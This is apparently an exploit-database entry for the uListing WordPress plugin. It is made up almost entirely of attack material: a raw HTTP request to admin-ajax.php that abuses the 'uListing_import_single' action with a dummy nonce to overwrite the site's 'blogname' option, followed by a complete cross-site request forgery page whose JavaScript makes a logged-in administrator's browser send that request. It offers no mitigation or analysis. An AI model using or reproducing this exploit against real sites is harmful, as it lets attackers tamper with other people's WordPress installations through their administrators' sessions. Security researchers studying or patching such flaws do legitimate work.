Share
## https://sploitus.com/exploit?id=WPEX-ID:FE0FEE35-4F20-4AB9-A18C-85A76A61EF09
This will update the blogname option to Hacked.
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------425604886635129992692405644198
Content-Length: 713
Connection: close
Cookie: [admin via CSRF]
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="file"; filename="hello.txt"
Content-Type: text/plain
Hacked
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="nonce"
dummy
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="type"
inventory
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="action"
uListing_import_single
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="id"
blogname
-----------------------------425604886635129992692405644198--
CSRF:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin-ajax.php", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------425604886635129992692405644198");
xhr.withCredentials = true;
var body = "-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"hello.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"Hacked\n" +
"\r\n" +
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"nonce\"\r\n" +
"\r\n" +
"dummy\r\n" +
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"type\"\r\n" +
"\r\n" +
"inventory\r\n" +
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"uListing_import_single\r\n" +
"-----------------------------425604886635129992692405644198\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"blogname\r\n" +
"-----------------------------425604886635129992692405644198--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>